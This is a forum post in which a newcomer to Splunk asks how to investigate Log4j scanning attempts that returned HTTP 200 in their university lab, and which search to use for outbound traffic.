Hello, During that crazy 4logj times I would like ask you for advise. I am new in Splunk/security but I manage to create dashboard for 4logj attemps. I can see some 4logj scanning activity and codes are 404,400 etc = I am not really worry about. But sometimes I have code 200 as I can see this mean: The HTTP 200 OK success status response code indicates that the request has succeeded. The meaning of a success depends on the HTTP request method: ... GET : The resource has been fetched and is transmitted in the message body. i added screenshot. I am wondering how to investigate it? Should i check for outband traffic? what is the best query? as far i have just one index=firewall 170.210.45.163 AND 31.131.16.127 ? this is my Uni Lab environment so i just want to develop myself and learn , what you would do if you see such a string? many thanks
... View more